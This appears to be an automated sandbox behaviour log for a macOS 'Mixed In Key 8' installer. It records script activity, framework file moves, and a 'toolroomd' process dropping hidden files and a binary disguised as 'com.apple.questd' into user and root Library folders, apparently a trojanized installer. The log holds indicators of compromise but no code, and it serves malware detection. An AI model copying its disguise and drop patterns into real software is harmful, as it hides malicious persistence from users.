Source: /usr/bin/osascript (PID: 684)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 688)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 688)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 692)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 692)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 696)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 696)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 723)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 723)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 731)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 731)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 660)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 660)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 664)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 664)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 668)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 668)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 673)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 673)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 700)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 700)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 704)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 704)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 708)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 708)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 712)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 712)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 716)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/Digital Hub Scripting.osax/Contents/Info.plist
Source: /usr/bin/osascript (PID: 716)	AppleScript scripting addition info plist opened: /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/Info.plist

Source: /System/Library/CoreServices/Installer.app/Contents/MacOS/Installer (PID: 611)

CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist

Jump to behavior

Source: /Library/mixednkey/toolroomd (PID: 639)	File written: /Users/berri/Library/.b0MbtGgfS	Jump to dropped file
Source: /Library/mixednkey/toolroomd (PID: 639)	File written: /Library/AppQuest/com.apple.questd	Jump to dropped file
Source: /Library/mixednkey/toolroomd (PID: 639)	File written: /Users/berri/Library/AppQuest/com.apple.questd
Source: /Library/AppQuest/com.apple.questd (PID: 647)	File written: /private/var/root/Library/.osPtRL91w	Jump to dropped file
Source: /Library/AppQuest/com.apple.questd (PID: 647)	File written: /private/var/root/Library/AppQuest/com.apple.questd	Jump to dropped file
Source: /Library/AppQuest/com.apple.questd (PID: 647)	File written: /Users/berri/Library/AppQuest/com.apple.questd	Jump to dropped file

Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)

File written: /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/.BC.T_1vBs2h

Jump to dropped file

Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)

File written: /private/var/run/.dat.nosync026b.D95Sto -> contains PID 619

Jump to dropped file

Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_vJQxkk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftAppKit.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_CK8OV0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreImage.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_PoqHP2 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftObjectiveC.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_P7ITqX -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftXPC.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_OJuoG6 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCore.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_IGZD8x -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreGraphics.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_282o63 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftMetal.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_Wh10S7 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreData.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_3wqJNg -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftDispatch.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_FxyJp8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftos.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/_CodeSignature/.BC.T_CLuZtV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/.BC.T_Wq6vpD -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/MIKToolkit	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_uYw3d5 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/PublicationWindow.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_k4X6fk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/News.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_F9I9ro -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/InfoPlist.strings	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_5i6eGZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/About.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_Cl6OO1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/CopyrightInformation.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_kXWjvw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/Feedback.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/.BC.T_aOps7J -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/en.lproj/EULA.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_rVW1UK -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/TooltipPopoverView.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_cw58cq -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/SlideUpPanel.nib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_PlN035 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/XButton.png	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/.BC.T_UoPZRW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKToolkit.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_P7av4Y -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftCoreFoundation.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_6lq4qy -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftDarwin.dylib	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/_CodeSignature/.BC.T_ObfZKL -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/_CodeSignature/CodeResources	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/.BC.T_6nBAgb -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/MIKMIDIPort_SubclassMethods.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/.BC.T_AC0Yv0 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/PrivateHeaders/MIKMIDIEventIterator.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/.BC.T_S1mY8H -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/MIKMIDI	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Resources/.BC.T_6msHOn -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Resources/Info.plist	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_X1w1iZ -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDeviceManager.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_6ng2gU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTextEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_iL45vG -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIResponder.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Pdd9W1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaKeySignatureEvent.h	Jump to behavior
Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 619)	Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_vU9KgC -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDICompilerCompatibility.h	Jump to behavior
